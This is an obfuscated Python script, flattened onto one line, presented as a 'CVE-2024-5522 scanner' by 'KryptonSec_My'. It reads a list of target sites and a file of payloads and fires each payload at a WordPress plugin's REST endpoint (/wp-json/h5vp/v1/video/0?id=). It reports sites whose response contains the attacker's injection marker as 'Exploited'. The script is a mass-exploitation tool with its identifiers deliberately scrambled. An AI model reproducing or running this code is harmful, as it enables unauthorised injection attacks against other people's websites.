lllllllllllllll, llllllllllllllI, lllllllllllllIl, lllllllllllllII, llllllllllllIll, llllllllllllIlI = open, print, __name__, input, getattr, bytes from os.path import expanduser as llIIIIllllIIIl from requests import get as IIIIlIlIlllIII from requests.exceptions import RequestException as IlllIIIlllIlII lllIlIlIlIlIIIlIIl = 'payload.txt' from colorama import Fore as IlIllIIIIIIlIl def IIlllIIlllllIIIlII(): IllIllIIllllllIIII = '\n ______ ______ ___ ___ ___ ____ ____ ____ ___ ___ \n / ___| | / / ______|_ / _ \\|_ / / /____/ __// __/|_ ||_ |\n / /__ | |/ / _//___/ __/ // / __/_ _/___/__ \\/__ \\/ __// __/ \n \\___/ |___/___/ /____\\___/____//_/ /____/____/____/____/ \n CVE-2024-5522 scanner\n made by KryptonSec_My\n ' llllllllllllllI(IllIllIIllllllIIII) def llIlIlllIIIlIIllll(lIlllllIIllIlIllIl): IllIllIIllllllIIII = llIIIIllllIIIl(lIlllllIIllIlIllIl) with lllllllllllllll(IllIllIIllllllIIII, 'r') as lllIIlIlllIlIllIll: return [llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('7374726970').decode())() for IllIllIIllllllIIII in llllllllllllIll(lllIIlIlllIlIllIll, llllllllllllIll(llllllllllllIlI, 'fromhex')('726561646c696e6573').decode())()] def llIllllIlIIllIIlIl(lIlllllIIllIlIllIl): with lllllllllllllll(lllIlIlIlIlIIIlIIl, 'r') as IllIllIIllllllIIII: return [llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('7374726970').decode())() for IllIllIIllllllIIII in llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('726561646c696e6573').decode())()] def IlIllIlIlIIIIlIllI(llllllIIIlllIIIIIl, IIIIllIlIlIIIIIlII, lIIIlllIllIIllIIlI): IllIllIIllllllIIII = llllllIIIlllIIIIIl if not llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('73746172747377697468').decode())('http'): IllIllIIllllllIIII = 'https://' + IllIllIIllllllIIII lllIIlIlllIlIllIll = f'{IllIllIIllllllIIII}/wp-json/h5vp/v1/video/0?id={IIIIllIlIlIIIIIlII}' try: lIIIllllIllllllllI = IIIIlIlIlllIII(lllIIlIlllIlIllIll, timeout=10) if 'Injected By KryptonSec_My' in lIIIllllIllllllllI.text: llllllllllllllI(IlIllIIIIIIlIl.GREEN + f'[+] Target Has Been Exploit! :D {IllIllIIllllllIIII}' + IlIllIIIIIIlIl.WHITE) llllllllllllIll(lIIIlllIllIIllIIlI, llllllllllllIll(llllllllllllIlI, 'fromhex')('617070656e64').decode())(lllIIlIlllIlIllIll) else: llllllllllllllI(IlIllIIIIIIlIl.RED + f'[-] {IllIllIIllllllIIII} seems not vulnerable :(' + IlIllIIIIIIlIl.WHITE) except IlllIIIlllIlII as IIlIIllllllllIlIll: llllllllllllllI(IlIllIIIIIIlIl.RED + f'[!] Error connecting to {IllIllIIllllllIIII}: {IIlIIllllllllIlIll}' + IlIllIIIIIIlIl.WHITE) def lIIllIIIIlllllIlII(llIIlllllllIllllIl, lIlIIIIIIllIIIlIlI): lIIIllllIllllllllI = llIlIlllIIIlIIllll(llIIlllllllIllllIl) IIlIIllllllllIlIll = llIllllIlIIllIIlIl(lIlIIIIIIllIIIlIlI) IllIllIIllllllIIII = [] for lllIIlIlllIlIllIll in lIIIllllIllllllllI: llllllllllllllI(IlIllIIIIIIlIl.CYAN + f'\n[Scanning {lllIIlIlllIlIllIll}]' + IlIllIIIIIIlIl.WHITE) for IIlIlIlIIIIlIIlllI in IIlIIllllllllIlIll: IlIllIlIlIIIIlIllI(lllIIlIlllIlIllIll, IIlIlIlIIIIlIIlllI, IllIllIIllllllIIII) if IllIllIIllllllIIII: llllllllllllllI(IlIllIIIIIIlIl.BLUE + '\n[Exploited URLs]' + IlIllIIIIIIlIl.WHITE) for lllIIIlIIlIIlIIIII in IllIllIIllllllIIII: llllllllllllllI(lllIIIlIIlIIlIIIII + IlIllIIIIIIlIl.CYAN + '\n[+]' + IlIllIIIIIIlIl.WHITE) else: llllllllllllllI(IlIllIIIIIIlIl.RED + '\nNo vulnerabilities found.' + IlIllIIIIIIlIl.WHITE) if lllllllllllllIl == '__main__': IIlllIIlllllIIIlII() llIIlllllllIllllIl = lllllllllllllII('Enter the path to the target list: ') lIIllIIIIlllllIlII(llIIlllllllIllllIl, lllIlIlIlIlIIIlIIl)